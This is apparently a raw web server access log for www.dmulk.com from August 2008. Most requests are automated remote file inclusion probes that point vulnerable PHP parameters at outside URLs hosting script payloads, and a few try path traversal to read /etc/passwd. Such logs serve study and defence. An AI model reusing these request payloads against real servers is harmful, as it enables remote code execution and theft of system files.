204.15.10.22 - - [21/Aug/2008:10:34:29 -0700] "GET /index.php?pag=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 200 9902 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:10:34:36 -0700] "GET /logs/access_080807.log/index.php?inc=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:10:34:36 -0700] "GET /logs/index.php?inc=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:10:34:37 -0700] "GET /index.php?inc=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 200 9902 "-" "libwww-perl/5.810" "www.dmulk.com"
217.17.142.173 - - [21/Aug/2008:10:34:38 -0700] "GET /logs/access_080730.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.caneus.org/d??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:10:34:42 -0700] "GET /logs/access_080731.log/index.php?pag=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:10:34:58 -0700] "GET /logs/access_080415.log/index.php?inc=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:35:16 -0700] "GET /logs/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:35:16 -0700] "GET /errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:35:17 -0700] "GET /logs/access_080804.log/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:35:23 -0700] "GET /logs/access_080621.log/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.214.192.30 - - [21/Aug/2008:10:36:00 -0700] "GET /logs/access_080810.log/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.30 - - [21/Aug/2008:10:36:01 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 200 9915 "-" "libwww-perl/5.808" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:36:04 -0700] "GET /logs/access_080728.log/index.php?p=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:36:04 -0700] "GET /logs/index.php?p=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:36:06 -0700] "GET /index.php?p=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 200 9900 "-" "libwww-perl/5.811" "www.dmulk.com"
87.230.22.202 - - [21/Aug/2008:10:36:08 -0700] "GET /logs/access_080727.log/forum.php?act=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:36:21 -0700] "GET /logs/access_080503.log//SQuery/lib/gore.php?libpath=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
190.41.11.250 - - [21/Aug/2008:10:37:46 -0700] "GET /logs/index.php?pag=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:37:47 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.41.11.250 - - [21/Aug/2008:10:37:47 -0700] "GET /logs/access_080731.log/index.php?pag=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:37:47 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.41.11.250 - - [21/Aug/2008:10:37:48 -0700] "GET /index.php?pag=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 200 9902 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:37:49 -0700] "GET /logs/access_080717.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:37:53 -0700] "GET /logs/access_080515.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:10:38:03 -0700] "GET /logs/access_080728.log/index.php?p=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:10:38:03 -0700] "GET /logs/index.php?p=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:10:38:04 -0700] "GET /index.php?p=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 200 9900 "-" "libwww-perl/5.810" "www.dmulk.com"
121.180.11.132 - - [21/Aug/2008:10:38:10 -0700] "GET /logs/access_080131.log/index2.php?p=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:38:36 -0700] "GET /logs/access_080503.log//SQuery/lib/gore.php?libpath=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.52.139.226 - - [21/Aug/2008:10:38:55 -0700] "GET /logs/access_080124.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [21/Aug/2008:10:38:57 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 200 9909 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [21/Aug/2008:10:38:57 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
190.41.11.250 - - [21/Aug/2008:10:39:41 -0700] "GET /index.php?inc=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 200 9902 "-" "libwww-perl/5.805" "www.dmulk.com"
190.41.11.250 - - [21/Aug/2008:10:39:43 -0700] "GET /logs/index.php?inc=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.41.11.250 - - [21/Aug/2008:10:39:43 -0700] "GET /logs/access_080807.log/index.php?inc=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:39:46 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:39:49 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:39:55 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:39:56 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.8.3.196 - - [21/Aug/2008:10:40:05 -0700] "GET /presto/ HTTP/1.1" 200 526 "http://www.google.co.th/search?hl=th&q=intitle%3A%22%3Findex+of%3F%22+Presto&btnG=%E0%B8%84%E0%B9%89%E0%B8%99%E0%B8%AB%E0%B8%B2&meta=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
58.8.3.196 - - [21/Aug/2008:10:40:06 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
58.8.3.196 - - [21/Aug/2008:10:40:08 -0700] "GET / HTTP/1.1" 200 9813 "http://www.dmulk.com/presto/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
58.8.3.196 - - [21/Aug/2008:10:40:09 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
58.8.3.196 - - [21/Aug/2008:10:40:09 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
58.8.3.196 - - [21/Aug/2008:10:40:09 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
58.8.3.196 - - [21/Aug/2008:10:40:10 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
58.8.3.196 - - [21/Aug/2008:10:40:10 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
58.8.3.196 - - [21/Aug/2008:10:40:11 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 200 8888 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:40:27 -0700] "GET /logs/access_080313.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
62.44.72.170 - - [21/Aug/2008:10:40:45 -0700] "GET /logs/access_080728.log////?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [21/Aug/2008:10:40:46 -0700] "GET ////?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 200 9974 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [21/Aug/2008:10:40:47 -0700] "GET /logs////?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 200 61577 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [21/Aug/2008:10:40:56 -0700] "GET /logs/access_080217.log////?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.133.96.246 - - [21/Aug/2008:10:42:03 -0700] "GET /logs/access_080303.log//index.php?config=1&base_datapath=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
83.133.96.246 - - [21/Aug/2008:10:42:03 -0700] "GET /logs//index.php?config=1&base_datapath=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
190.41.11.250 - - [21/Aug/2008:10:42:04 -0700] "GET /logs/access_080131.log/index.php?pag=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.133.96.246 - - [21/Aug/2008:10:42:04 -0700] "GET //index.php?config=1&base_datapath=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 200 9936 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
83.133.96.246 - - [21/Aug/2008:10:42:17 -0700] "GET /logs/access_080303.log//index.php?config=1&base_datapath=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
83.133.96.246 - - [21/Aug/2008:10:42:18 -0700] "GET /logs//index.php?config=1&base_datapath=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
83.133.96.246 - - [21/Aug/2008:10:42:18 -0700] "GET //index.php?config=1&base_datapath=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 200 9936 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
83.133.96.246 - - [21/Aug/2008:10:42:27 -0700] "GET /logs/access_080714.log//index.php?config=1&base_datapath=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
83.133.96.246 - - [21/Aug/2008:10:42:34 -0700] "GET /logs/access_080714.log//index.php?config=1&base_datapath=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:42:49 -0700] "GET /logs/access_080410.log/index.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:42:49 -0700] "GET /logs/index.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:42:51 -0700] "GET /index.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 200 9895 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [21/Aug/2008:10:42:57 -0700] "GET /logs/access_080321.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.64.200 - - [21/Aug/2008:10:43:02 -0700] "GET /logs/access_080218.log//components/com_user/controller.php?option=http://www.pasalabien.net/modules/crit??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.200 - - [21/Aug/2008:10:43:03 -0700] "GET //components/com_user/controller.php?option=http://www.pasalabien.net/modules/crit??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.200 - - [21/Aug/2008:10:43:03 -0700] "GET /logs//components/com_user/controller.php?option=http://www.pasalabien.net/modules/crit??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.200 - - [21/Aug/2008:10:43:05 -0700] "GET /logs/access_080214.log//components/com_user/controller.php?option=http://www.pasalabien.net/modules/crit??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
193.178.147.89 - - [21/Aug/2008:10:43:14 -0700] "GET /logs/access_080124.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
193.178.147.89 - - [21/Aug/2008:10:43:15 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/bajo.txt????? HTTP/1.1" 200 9922 "-" "libwww-perl/5.812" "www.dmulk.com"
193.178.147.89 - - [21/Aug/2008:10:43:16 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.113.226 - - [21/Aug/2008:10:43:31 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../idfast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:10:43:50 -0700] "GET /bikes/dteel/2008_07_03/?S=A HTTP/1.0" 200 835 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:10:43:56 -0700] "GET /logs/access_080811.log/errors.php?error=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:10:43:56 -0700] "GET /errors.php?error=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:10:43:56 -0700] "GET /logs/errors.php?error=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.178.147.89 - - [21/Aug/2008:10:44:00 -0700] "GET /logs/access_080810.log/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
193.178.147.89 - - [21/Aug/2008:10:44:01 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.topyn.com/bajo.txt????? HTTP/1.1" 200 9928 "-" "libwww-perl/5.812" "www.dmulk.com"
193.178.147.89 - - [21/Aug/2008:10:44:02 -0700] "GET /logs/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.111.176.88 - - [21/Aug/2008:10:44:17 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.icpqa.com/images/hantu.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.88 - - [21/Aug/2008:10:44:17 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.icpqa.com/images/hantu.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:10:44:20 -0700] "GET /logs/access_080718.log/errors.php?error=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.88 - - [21/Aug/2008:10:44:21 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.icpqa.com/images/hantu.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.88 - - [21/Aug/2008:10:44:22 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.icpqa.com/images/hantu.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:45:13 -0700] "GET /logs/access_080731.log/index.php?content=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:45:20 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.11.67.242 - - [21/Aug/2008:10:46:03 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [21/Aug/2008:10:46:03 -0700] "GET /errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [21/Aug/2008:10:46:03 -0700] "GET /logs/access_080717.log/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:46:12 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:46:13 -0700] "GET /logs/access_080809.log/layout/default/params.php?gConf[dir][layouts]=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:46:13 -0700] "GET /layout/default/params.php?gConf[dir][layouts]=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:46:13 -0700] "GET /logs/layout/default/params.php?gConf[dir][layouts]=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:46:21 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:46:21 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.11.67.242 - - [21/Aug/2008:10:46:29 -0700] "GET /logs/access_080515.log/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
119.63.193.186 - - [21/Aug/2008:10:47:17 -0700] "HEAD /retreat1/webcam/retreat1_00585.jpg HTTP/1.1" 200 0 "-" "BaiduImagespider+(+http://help.baidu.jp/system/05.html)" "www.dmulk.com"
119.63.193.186 - - [21/Aug/2008:10:47:17 -0700] "GET /retreat1/webcam/retreat1_00585.jpg HTTP/1.1" 200 56993 "-" "BaiduImagespider+(+http://help.baidu.jp/system/05.html)" "www.dmulk.com"
62.2.246.201 - - [21/Aug/2008:10:47:46 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://tvknob.com/pr.txt? HTTP/1.1" 200 9926 "-" "libwww-perl/5.805" "www.dmulk.com"
203.231.35.38 - - [21/Aug/2008:10:47:46 -0700] "GET /logs/errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
203.231.35.38 - - [21/Aug/2008:10:47:46 -0700] "GET /logs/access_080730.log/errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
203.231.35.38 - - [21/Aug/2008:10:47:46 -0700] "GET /errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
58.120.225.104 - - [21/Aug/2008:10:47:47 -0700] "GET /errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
58.120.225.104 - - [21/Aug/2008:10:47:47 -0700] "GET /logs/access_080730.log/errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
58.120.225.104 - - [21/Aug/2008:10:47:47 -0700] "GET /logs/errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
62.2.246.201 - - [21/Aug/2008:10:47:49 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.241.162 - - [21/Aug/2008:10:47:51 -0700] "GET /layout/default/params.php?gConf[dir][layouts]=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
67.19.241.162 - - [21/Aug/2008:10:47:54 -0700] "GET /logs/layout/default/params.php?gConf[dir][layouts]=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
62.2.246.201 - - [21/Aug/2008:10:47:57 -0700] "GET /logs/access_080717.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
